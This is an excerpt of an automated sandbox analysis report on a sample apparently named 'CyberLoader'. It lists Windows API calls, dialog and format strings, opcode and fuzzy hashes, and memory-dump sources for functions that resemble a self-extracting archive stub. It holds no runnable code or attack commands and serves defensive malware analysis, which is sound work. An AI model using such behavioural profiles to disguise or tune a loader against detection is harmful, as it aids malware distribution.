                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 5da36262ba9294c4502ddb329437c73c0850e74ab9ad7d7a4c200b6c9033f5cc
                                                  • Instruction ID: 96d65d1fbb9973ea4f25cf38f366e86d8a9ea2545ceb5c33ff887a40be71427e
                                                  • Opcode Fuzzy Hash: 5da36262ba9294c4502ddb329437c73c0850e74ab9ad7d7a4c200b6c9033f5cc
                                                  • Instruction Fuzzy Hash: 35A0029D57E1027D311D75516D16D76036CC4D5F51370491AF50A944D2A9C05C6D9531
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DC36
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 0dbf8e6470d24ef6245fb30e1059e1fa381c144d4dab521f2111c32f1d8809f6
                                                  • Instruction ID: 96d65d1fbb9973ea4f25cf38f366e86d8a9ea2545ceb5c33ff887a40be71427e
                                                  • Opcode Fuzzy Hash: 0dbf8e6470d24ef6245fb30e1059e1fa381c144d4dab521f2111c32f1d8809f6
                                                  • Instruction Fuzzy Hash: 35A0029D57E1027D311D75516D16D76036CC4D5F51370491AF50A944D2A9C05C6D9531
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetEndOfFile.KERNELBASE(?,00279104,?,?,-00001964), ref: 00279EC2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: File
                                                  • String ID:
                                                  • API String ID: 749574446-0
                                                  • Opcode ID: e05c266ecf7e6e5fbb851ad17c9b295a91e6e38334d94a874cc99287fae66547
                                                  • Instruction ID: 16ed71f2eb606d8f3844d762026c88dadf41ea9fef7134e275b3d8e4c9a083b1
                                                  • Opcode Fuzzy Hash: e05c266ecf7e6e5fbb851ad17c9b295a91e6e38334d94a874cc99287fae66547
                                                  • Instruction Fuzzy Hash: 56B011320A000A8B8E002B30EC08828BA20EA2230A30082A0B002CA0A0CF22C002AA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetCurrentDirectoryW.KERNELBASE(?,0028A587,C:\Users\user\Desktop,00000000,002B946A,00000006), ref: 0028A326
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory
                                                  • String ID:
                                                  • API String ID: 1611563598-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0027130B: GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                    • Part of subcall function 0027130B: SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0028B971
                                                  • EndDialog.USER32(?,00000006), ref: 0028B984
                                                  • GetDlgItem.USER32(?,0000006C), ref: 0028B9A0
                                                  • SetFocus.USER32(00000000), ref: 0028B9A7
                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0028B9E1
                                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0028BA18
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0028BA2E
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0028BA4C
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0028BA5C
                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0028BA78
                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0028BA94
                                                  • _swprintf.LIBCMT ref: 0028BAC4
                                                    • Part of subcall function 0027400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027401D
                                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0028BAD7
                                                  • FindClose.KERNEL32(00000000), ref: 0028BADE
                                                  • _swprintf.LIBCMT ref: 0028BB37
                                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 0028BB4A
                                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0028BB67
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0028BB87
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0028BB97
                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0028BBB1
                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0028BBC9
                                                  • _swprintf.LIBCMT ref: 0028BBF5
                                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0028BC08
                                                  • _swprintf.LIBCMT ref: 0028BC5C
                                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 0028BC6F
                                                    • Part of subcall function 0028A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0028A662
                                                    • Part of subcall function 0028A63C: GetNumberFormatW.KERNEL32 ref: 0028A6B1
                                                  Similarity
                                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                  • API String ID: 797121971-1840816070
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00277191
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 002772F1
                                                  • CloseHandle.KERNEL32(00000000), ref: 00277301
                                                    • Part of subcall function 00277BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00277C04
                                                    • Part of subcall function 00277BF5: GetLastError.KERNEL32 ref: 00277C4A
                                                    • Part of subcall function 00277BF5: CloseHandle.KERNEL32(?), ref: 00277C59
                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0027730C
                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0027741A
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00277446
                                                  • CloseHandle.KERNEL32(?), ref: 00277457
                                                  • GetLastError.KERNEL32 ref: 00277467
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 002774B3
                                                  • DeleteFileW.KERNEL32(?), ref: 002774DB
                                                  Similarity
                                                  • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                  • API String ID: 3935142422-3508440684
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0028A662
                                                  • GetNumberFormatW.KERNEL32 ref: 0028A6B1
                                                  Similarity
                                                  • API ID: FormatInfoLocaleNumber
                                                  • String ID:
                                                  • API String ID: 2169056816-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32(0028117C,?,00000200), ref: 00276EC9
                                                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00276EEA
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 0027AD1A
                                                  Similarity
                                                  • API ID: Version
                                                  • String ID:
                                                  • API String ID: 1889659487-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _swprintf.LIBCMT ref: 0027DABE
                                                    • Part of subcall function 0027400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027401D
                                                    • Part of subcall function 00281596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,002B0EE8,00000200,0027D202,00000000,?,00000050,002B0EE8), ref: 002815B3
                                                  • _strlen.LIBCMT ref: 0027DADF
                                                  • SetDlgItemTextW.USER32(?,002AE154,?), ref: 0027DB3F
                                                  • GetWindowRect.USER32(?,?), ref: 0027DB79
                                                  • GetClientRect.USER32(?,?), ref: 0027DB85
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0027DC25
                                                  • GetWindowRect.USER32(?,?), ref: 0027DC52
                                                  • SetWindowTextW.USER32(?,?), ref: 0027DC95
                                                  • GetSystemMetrics.USER32(00000008), ref: 0027DC9D
                                                  • GetWindow.USER32(?,00000005), ref: 0027DCA8
                                                  • GetWindowRect.USER32(00000000,?), ref: 0027DCD5
                                                  • GetWindow.USER32(00000000,00000002), ref: 0027DD47
                                                  Similarity
                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                  • String ID: $%s:$CAPTION$T*$d
                                                  • API String ID: 2407758923-4076971296
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 0029C277
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE2F
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE41
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE53
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE65
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE77
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE89
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE9B
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BEAD
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BEBF
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BED1
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BEE3
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BEF5
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BF07
                                                  • _free.LIBCMT ref: 0029C26C
                                                    • Part of subcall function 002984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?), ref: 002984F4
                                                    • Part of subcall function 002984DE: GetLastError.KERNEL32(?,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?,?), ref: 00298506
                                                  • _free.LIBCMT ref: 0029C28E
                                                  • _free.LIBCMT ref: 0029C2A3
                                                  • _free.LIBCMT ref: 0029C2AE
                                                  • _free.LIBCMT ref: 0029C2D0
                                                  • _free.LIBCMT ref: 0029C2E3
                                                  • _free.LIBCMT ref: 0029C2F1
                                                  • _free.LIBCMT ref: 0029C2FC
                                                  • _free.LIBCMT ref: 0029C334
                                                  • _free.LIBCMT ref: 0029C33B
                                                  • _free.LIBCMT ref: 0029C358
                                                  • _free.LIBCMT ref: 0029C370
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID: P*
                                                  • API String ID: 161543041-889178550
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetWindow.USER32(?,00000005), ref: 0028CD51
                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0028CD7D
                                                    • Part of subcall function 002817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0027BB05,00000000,.exe,?,?,00000800,?,?,002885DF,?), ref: 002817C2
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0028CD99
                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0028CDB0
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0028CDC4
                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0028CDED
                                                  • DeleteObject.GDI32(00000000), ref: 0028CDF4
                                                  • GetWindow.USER32(00000000,00000002), ref: 0028CDFD
                                                  Similarity
                                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                  • String ID: STATIC
                                                  • API String ID: 3820355801-1882779555
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 00298EC5
                                                    • Part of subcall function 002984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?), ref: 002984F4
                                                    • Part of subcall function 002984DE: GetLastError.KERNEL32(?,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?,?), ref: 00298506
                                                  • _free.LIBCMT ref: 00298ED1
                                                  • _free.LIBCMT ref: 00298EDC
                                                  • _free.LIBCMT ref: 00298EE7
                                                  • _free.LIBCMT ref: 00298EF2
                                                  • _free.LIBCMT ref: 00298EFD
                                                  • _free.LIBCMT ref: 00298F08
                                                  • _free.LIBCMT ref: 00298F13
                                                  • _free.LIBCMT ref: 00298F1E
                                                  • _free.LIBCMT ref: 00298F2C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: ff7785f84c26a626d2ab15a8ab3ec0d95d5f4e894f3c8c179dd0f8e1ae1086d1
                                                  • Instruction ID: d5196d35ea0dc146951c14f18f784273123fe7ab051c0bd1f6add5d2b8d2883a
                                                  • Opcode Fuzzy Hash: ff7785f84c26a626d2ab15a8ab3ec0d95d5f4e894f3c8c179dd0f8e1ae1086d1
                                                  • Instruction Fuzzy Hash: 2611A47652010DAFCF11EF54C942CDA3BA5FF06350B5A50A5BA088B626EA31EA61DF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ;%u$x%u$xc%u
                                                  • API String ID: 0-2277559157
                                                  • Opcode ID: c755fee75fe2bee979d566c1bf5cc42a34af7b62c383e24cc86084a2681721c6
                                                  • Instruction ID: 4d460cceff5123054113950d1fa79c6d6786efb45172178d33d53f6bb2706c6e
                                                  • Opcode Fuzzy Hash: c755fee75fe2bee979d566c1bf5cc42a34af7b62c383e24cc86084a2681721c6
                                                  • Instruction Fuzzy Hash: 76F139706242419BDB19EF3485D5BEA7799AFD0300F08C46DF88D9B283DA74D96CCB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0027130B: GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                    • Part of subcall function 0027130B: SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  • EndDialog.USER32(?,00000001), ref: 0028AD20
                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0028AD47
                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0028AD60
                                                  • SetWindowTextW.USER32(?,?), ref: 0028AD71
                                                  • GetDlgItem.USER32(?,00000065), ref: 0028AD7A
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0028AD8E
                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0028ADA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                                  • String ID: LICENSEDLG
                                                  • API String ID: 3214253823-2177901306
                                                  • Opcode ID: ecb77f7280bb930adb32374e56740831f721579fb054ba544181aba0b23140df
                                                  • Instruction ID: fceb9297faf90fda6a06dfb55d9ae5adad6d5b55e9c644193e176768a40dabe5
                                                  • Opcode Fuzzy Hash: ecb77f7280bb930adb32374e56740831f721579fb054ba544181aba0b23140df
                                                  • Instruction Fuzzy Hash: D821A535662105BBE6216F21BC4DF3B3B6CEB5A746F014016F604E24E1DE62AD24D732
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00279448
                                                  • GetLongPathNameW.KERNEL32 ref: 0027946B
                                                  • GetShortPathNameW.KERNEL32 ref: 0027948A
                                                    • Part of subcall function 002817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0027BB05,00000000,.exe,?,?,00000800,?,?,002885DF,?), ref: 002817C2
                                                  • _swprintf.LIBCMT ref: 00279526
                                                    • Part of subcall function 0027400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027401D
                                                  • MoveFileW.KERNEL32 ref: 00279595
                                                  • MoveFileW.KERNEL32 ref: 002795D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                  • String ID: rtmp%d
                                                  • API String ID: 2111052971-3303766350
                                                  • Opcode ID: 6d25b5fd6baf337014ec9e095ecae4f9b139760ec3f48cfbd79da1be5320d7b1
                                                  • Instruction ID: c437af3e0d966dec8143ec1adc8113e1a27b3c2f8f9e6e259d39e0145e8807db
                                                  • Opcode Fuzzy Hash: 6d25b5fd6baf337014ec9e095ecae4f9b139760ec3f48cfbd79da1be5320d7b1
                                                  • Instruction Fuzzy Hash: 51415071920259AACF21EF648C85EDE737CAF51380F0485E5B54DA3041EB748BE9CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32(?,002B0EE8,00293E14,002B0EE8,?,?,00293713,00000050,?,002B0EE8,00000200), ref: 00298FA9
                                                  • _free.LIBCMT ref: 00298FDC
                                                  • _free.LIBCMT ref: 00299004
                                                  • SetLastError.KERNEL32(00000000,?,002B0EE8,00000200), ref: 00299011
                                                  • SetLastError.KERNEL32(00000000,?,002B0EE8,00000200), ref: 0029901D
                                                  • _abort.LIBCMT ref: 00299023
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID: X*
                                                  • API String ID: 3160817290-76513911
                                                  • Opcode ID: 22157a33c6a48666592a8e7a91dffa0781e4e143c689e81f04a7be7af6b51f35
                                                  • Instruction ID: 134e5c879545984806f20171d7a75c2ed4472f46d9493c023a4a5049811821de
                                                  • Opcode Fuzzy Hash: 22157a33c6a48666592a8e7a91dffa0781e4e143c689e81f04a7be7af6b51f35
                                                  • Instruction Fuzzy Hash: 5DF028365346026BCE217B287C0EB2B292A9FC3770F2E0028F515D3692EF31CD325850
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __aulldiv.LIBCMT ref: 00280A9D
                                                    • Part of subcall function 0027ACF5: GetVersionExW.KERNEL32(?), ref: 0027AD1A
                                                  • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00280AC0
                                                  • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00280AD2
                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00280AE3
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00280AF3
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00280B03
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00280B3D
                                                  • __aullrem.LIBCMT ref: 00280BCB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                  • String ID:
                                                  • API String ID: 1247370737-0
                                                  • Opcode ID: e2fdd8d8e0c4c5cec857a614bbe7b9560c1e38039e0c07690c4d16004dc5f4a7
                                                  • Instruction ID: 48c6621c5929b969ae2d574c08f1a3310ad632f5fae3320edf378b016439b779
                                                  • Opcode Fuzzy Hash: e2fdd8d8e0c4c5cec857a614bbe7b9560c1e38039e0c07690c4d16004dc5f4a7
                                                  • Instruction Fuzzy Hash: 844149B5408306AFC750DF65C88496BFBF8FF88718F004A2EF59692650E778E558CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0029F5A2,?,00000000,?,00000000,00000000), ref: 0029EE6F
                                                  • __fassign.LIBCMT ref: 0029EEEA
                                                  • __fassign.LIBCMT ref: 0029EF05
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0029EF2B
                                                  • WriteFile.KERNEL32(?,?,00000000,0029F5A2,00000000,?,?,?,?,?,?,?,?,?,0029F5A2,?), ref: 0029EF4A
                                                  • WriteFile.KERNEL32(?,?,00000001,0029F5A2,00000000,?,?,?,?,?,?,?,?,?,0029F5A2,?), ref: 0029EF83
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: c7dc2eb14e928aebfb178dec7d0c3024df57fe78ac8756231c8e20c1a5aadee3
                                                  • Instruction ID: 1abf4cdc4a99dfb7363fb0b1c90473bfeb6dbbeb8f6156436f07bb71b781060b
                                                  • Opcode Fuzzy Hash: c7dc2eb14e928aebfb178dec7d0c3024df57fe78ac8756231c8e20c1a5aadee3
                                                  • Instruction Fuzzy Hash: 7C51B070A10209AFCF10CFA8D885BEEBBF9EF09310F25451AE955E7691E770A950CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000800,?), ref: 0028C54A
                                                  • _swprintf.LIBCMT ref: 0028C57E
                                                    • Part of subcall function 0027400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027401D
                                                  • SetDlgItemTextW.USER32(?,00000066,002B946A), ref: 0028C59E
                                                  • _wcschr.LIBVCRUNTIME ref: 0028C5D1
                                                  • EndDialog.USER32(?,00000001), ref: 0028C6B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                  • String ID: %s%s%u
                                                  • API String ID: 2892007947-1360425832
                                                  • Opcode ID: 6b50b619fb487af4bd7d70458e0dcce56cb52c58ed7cdc216d6e07c3ed2d51df
                                                  • Instruction ID: cc4a38ef69941ca44892dc041e819ddad4f1986e192a4c0182a4b996d9c9245d
                                                  • Opcode Fuzzy Hash: 6b50b619fb487af4bd7d70458e0dcce56cb52c58ed7cdc216d6e07c3ed2d51df
                                                  • Instruction Fuzzy Hash: EB41C475D20619AADF26EFA0DC45EDA77BCEF48301F1040A6E509E60A1E7719BD4CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00288F38
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00288F59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AllocByteCharGlobalMultiWide
                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                  • API String ID: 3286310052-4209811716
                                                  • Opcode ID: 7e5a5ef17a70c930cc85c189cfda993b3240638fe66b7e0eb2f8251e7f1f5f36
                                                  • Instruction ID: 650d3aab3ca5afad6d07f57f15fbe14a6102e3e6dabcf7e4258826c52972216d
                                                  • Opcode Fuzzy Hash: 7e5a5ef17a70c930cc85c189cfda993b3240638fe66b7e0eb2f8251e7f1f5f36
                                                  • Instruction Fuzzy Hash: BB3148355293126BDB24BF309C06FAB7B68DF96720F80011EF901961D2EF649A2987A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
